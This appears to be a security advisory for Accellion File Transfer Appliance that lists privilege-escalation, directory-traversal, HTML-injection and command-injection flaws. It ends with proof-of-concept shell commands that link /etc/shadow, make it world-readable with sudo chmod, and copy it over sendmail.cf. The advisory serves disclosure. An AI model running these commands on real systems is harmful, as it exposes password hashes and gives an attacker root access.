20 lines
No EOL
848 B
Text
20 lines
No EOL
848 B
Text
source: https://www.securityfocus.com/bid/38176/info
|
|
|
|
Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including:
|
|
|
|
- Multiple privilege-escalation issues
|
|
- A directory-traversal issue
|
|
- An HTML-injection issue
|
|
- A remote command-injection issue
|
|
|
|
An attacker may leverage these issues to execute arbitrary script code within the context of the webserver, steal cookie-based authentication credentials, obtain sensitive information, and execute arbitrary code or commands with superuser privileges. Other attacks are also possible.
|
|
|
|
The following proofs of concept are available:
|
|
|
|
sh-2.05b$ ln /etc/shadow /home/admin/oldtemp
|
|
sh-2.05b$ sudo /bin/chmod 666 /home/admin/oldtemp
|
|
|
|
sh-2.05b$ ln /etc/shadow /home/admin/temp
|
|
sh-2.05b$ sudo /bin/cp /home/admin/temp /etc/mail/sendmail.cf
|
|
|
|
sh-2.05b$ sudo /usr/local/bin/admin.pl |